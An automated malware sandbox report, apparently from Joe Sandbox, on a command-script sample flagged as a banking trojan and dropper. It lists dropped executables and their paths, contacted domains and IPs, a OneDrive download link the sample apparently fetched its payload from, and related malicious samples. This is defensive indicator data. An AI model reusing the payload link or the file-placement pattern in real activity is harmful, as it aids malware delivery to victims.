        C:\Users\Public\ger.exe0%ReversingLabs
        C:\Users\Public\kn.exe0%ReversingLabs
        C:\Users\Public\xkn.exe0%ReversingLabs
        C:\Windows \System32\per.exe3%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        dual-spov-0006.spov-msedge.net0%VirustotalBrowse
        onedrive.live.com1%VirustotalBrowse
        18.31.95.13.in-addr.arpa0%VirustotalBrowse
        183.59.114.20.in-addr.arpa1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://login.microsoftonline.com/%s/oauth2/token0%Avira URL Cloudsafe
        https://login.microsoftonline.com/%s/oauth2/authorize0%Avira URL Cloudsafe
        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP0%Avira URL Cloudsafe
        https://acctcdn.msftauth.net/0%Avira URL Cloudsafe
        https://lgincdnmsftuswe2.azureedge.ne0%Avira URL Cloudsafe
        https://logincdn.msftauth.net0%Avira URL Cloudsafe
        https://acctcdn.m0%Avira URL Cloudsafe
        https://login.microsoftonline.com/%s/oauth2/token0%VirustotalBrowse
        https://lgincdnmsftuswe2.azureedge.ne0%VirustotalBrowse
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico0%Avira URL Cloudsafe
        https://onedrive.live.com/zfo0%Avira URL Cloudsafe
        https://aka.ms/pscore60%Avira URL Cloudsafe
        https://live.com/H0%Avira URL Cloudsafe
        https://acctcdn.msftauth.net/0%VirustotalBrowse
        https://login.microsoftonline.com/%s/oauth2/authorize0%VirustotalBrowse
        https://logincdn.msftauth.net1%VirustotalBrowse
        https://lgincdnvzeuno.azureedgL0%Avira URL Cloudsafe
        https://live.com/L0%Avira URL Cloudsafe
        https://onedrive.live.com/fo0%Avira URL Cloudsafe
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico0%VirustotalBrowse
        https://acctcdn.msftauth.net0%Avira URL Cloudsafe
        https://live.com/H0%VirustotalBrowse
        https://enterpriseregistration.windows.net/EnrollmentServer/key/0%Avira URL Cloudsafe
        https://logincdn.msftauth.net/0%Avira URL Cloudsafe
        https://onedrive.live.com/0%Avira URL Cloudsafe
        https://live.com/s0%Avira URL Cloudsafe
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=0%Avira URL Cloudsafe
        https://enterpriseregistration.windows.net/EnrollmentServer/key/0%VirustotalBrowse
        https://live.com/L0%VirustotalBrowse
        https://acctcdn.msftauth.net0%VirustotalBrowse
        https://live.com/40%Avira URL Cloudsafe
        https://logincdn.ms0%Avira URL Cloudsafe
        https://aka.ms/pscore60%VirustotalBrowse
        https://live.com/w0%Avira URL Cloudsafe
        https://live.com/:p0%Avira URL Cloudsafe
        https://logincdn.ms0%VirustotalBrowse
        https://live.com/s0%VirustotalBrowse
        https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah0%Avira URL Cloudsafe
        https://logincdn.msftauth.net/1%VirustotalBrowse
        https://onedrive.live.com/1%VirustotalBrowse
        https://live.com/40%VirustotalBrowse
        https://live.com/w0%VirustotalBrowse
        https://live.com/0%Avira URL Cloudsafe
        https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey=0%Avira URL Cloudsafe
        https://live.com/#0%Avira URL Cloudsafe
        https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc0%Avira URL Cloudsafe
        https://lgincdnvzeuno.azureed0%Avira URL Cloudsafe
        https://onedrive.live.com/No0%Avira URL Cloudsafe
        https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js0%Avira URL Cloudsafe
        http://www.pmail.com0%Avira URL Cloudsafe
        https://%ws/%ws_%ws_%ws/service.svc/%ws0%Avira URL Cloudsafe
        https://enterpriseregistration.windows.net/EnrollmentServer/device/0%Avira URL Cloudsafe
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f00%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dual-spov-0006.spov-msedge.net
        		13.107.137.11
        		truetrueunknown
        onedrive.live.com
        		unknown
        		unknowntrueunknown
        18.31.95.13.in-addr.arpa
        		unknown
        		unknownfalseunknown
        183.59.114.20.in-addr.arpa
        		unknown
        		unknownfalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0true
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://acctcdn.msftauth.net/Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://lgincdnmsftuswe2.azureedge.nePing_c.pif, 0000001F.00000003.2357978518.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://acctcdn.mPing_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://logincdn.msftauth.netPing_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.icoPing_c.pif, 0000001F.00000003.1673627946.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460371452.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888837366.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027276000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.0000000027240000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.0000000027203000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027282000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/zfoPing_c.pif, 0000001F.00000003.2020461089.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/pscore6xkn.exe, 00000011.00000002.1501921672.00000223D54B3000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/HPing_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://lgincdnvzeuno.azureedgLPing_c.pif, 0000001F.00000003.1859829424.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1853005680.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/LPing_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/foPing_c.pif, 0000001F.00000003.1826725982.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://acctcdn.msftauth.netPing_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://logincdn.msftauth.net/Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/Ping_c.pif, 0000001F.00000003.2394138435.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/sPing_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=Ping_c.pif, 0000001F.00000003.2427549071.00000000007EE000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://live.com/4Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://logincdn.msPing_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/wPing_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/:pPing_c.pif, 0000001F.00000003.1673627946.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey=Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://live.com/#Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
        • Avira URL Cloud: safe
        		unknown
        https://onedrive.live.com/NoPing_c.pif, 0000001F.00000003.2216274021.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/pscore68xkn.exe, 00000011.00000002.1501921672.00000223D54FC000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://lgincdnvzeuno.azureedPing_c.pif, 0000001F.00000003.1882008954.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888765366.0000000027219000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexkn.exe, 00000011.00000002.1501921672.00000223D552B000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.jsPing_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1786740158.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.pmail.comPing_c.pif, Ping_c.pif, 0000001F.00000002.2707007653.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727734958.000000007FC40000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
        • Avira URL Cloud: safe
        		unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        13.107.137.11
        		dual-spov-0006.spov-msedge.netUnited States
        		8068MICROSOFT-CORP-MSN-AS-BLOCKUStrue

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1515085
        Start date and time:2024-09-21 16:21:06 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 37s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:43
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:1
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:rPO767575.cmd
        Detection:MAL
        Classification:mal100.bank.troj.expl.evad.winCMD@65/25@6/1
        EGA Information:
        • Successful, ratio: 90%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 42
        • Number of non-executed functions: 229
        Cookbook Comments:
        • Found application associated with file extension: .cmd

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.68, 20.190.159.64, 20.190.159.71, 20.190.159.23, 20.190.159.4, 20.190.159.73, 40.126.31.67, 184.28.90.27, 40.126.31.69, 20.190.159.75, 40.126.31.71, 20.190.159.0
        • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, cxcs.microsoft.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
        • Execution Graph export aborted for target xkn.exe, PID 6528 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        10:22:16API Interceptor34x Sleep call for process: Ping_c.pif modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
        • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        dual-spov-0006.spov-msedge.nethttps://1drv.ms/o/c/8d397705294be844/Ej05S04brJ5Gk0BP_zBxdzgB_4nKyGxS56LL4LZ9Pc6fmQ?e=3DjGg4Get hashmaliciousHtmlDropperBrowse
        • 13.107.137.11
        https://bit.ly/3e7c84f1a590a3e6Get hashmaliciousUnknownBrowse
        • 13.107.139.11
        i45qm2CawaGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        https://1drv.ms/o/c/14c2aef4e2cd9199/EjbyQwyIjfhEmiCpubnJGm8BRFF0427oUHOxk88uqC5T0Q?e=0lgh0xGet hashmaliciousUnknownBrowse
        • 13.107.139.11
        https://1drv.ms/b/c/7bab8803aa446446/EVRHiu8efYZAkD-YFD5xQmIBzT5hMnGkyiNpwrnOj-mH_gGet hashmaliciousHTMLPhisherBrowse
        • 13.107.139.11
        https://1drv.ms/o/s!BDwGtOL3Ob0ShF7R9UYMfic1EmBo?e=xcw67NPIpE-D6DjdNd9CDg&at=9Get hashmaliciousHTMLPhisherBrowse
        • 13.107.139.11
        Ln3Yc2X66g.exeGet hashmaliciousDBatLoaderBrowse
        • 13.107.139.11
        Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • 13.107.137.11
        Payment Details.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • 13.107.137.11
        ESW31074TS510.exeGet hashmaliciousDBatLoaderBrowse
        • 13.107.137.11

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        MICROSOFT-CORP-MSN-AS-BLOCKUS160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.25.xlsGet hashmaliciousUnknownBrowse
        • 13.107.246.60
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.24.xlsGet hashmaliciousUnknownBrowse
        • 13.107.246.60
        8zzBr1gT31.elfGet hashmaliciousMiraiBrowse
        • 22.112.76.125
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.23.xlsGet hashmaliciousUnknownBrowse
        • 13.107.246.60
        GyFcTadTZv.elfGet hashmaliciousMiraiBrowse
        • 13.83.227.6
        iZP1hJhnmz.elfGet hashmaliciousMiraiBrowse
        • 22.204.62.58
        dAlxfXyNm7.elfGet hashmaliciousMiraiBrowse
        • 20.104.105.19
        05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
        • 20.228.79.144
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.22.xlsGet hashmaliciousUnknownBrowse
        • 13.107.246.42
        9B10a4bkpu.elfGet hashmaliciousMiraiBrowse
        • 20.15.12.204

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        a0e9f5d64349fb13191bc781f81f42e1160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.25.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.24.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.23.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.22.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.21.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.20.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.19.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.18.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11
        7IAKm8NRNK.docGet hashmaliciousUnknownBrowse
        • 13.107.137.11
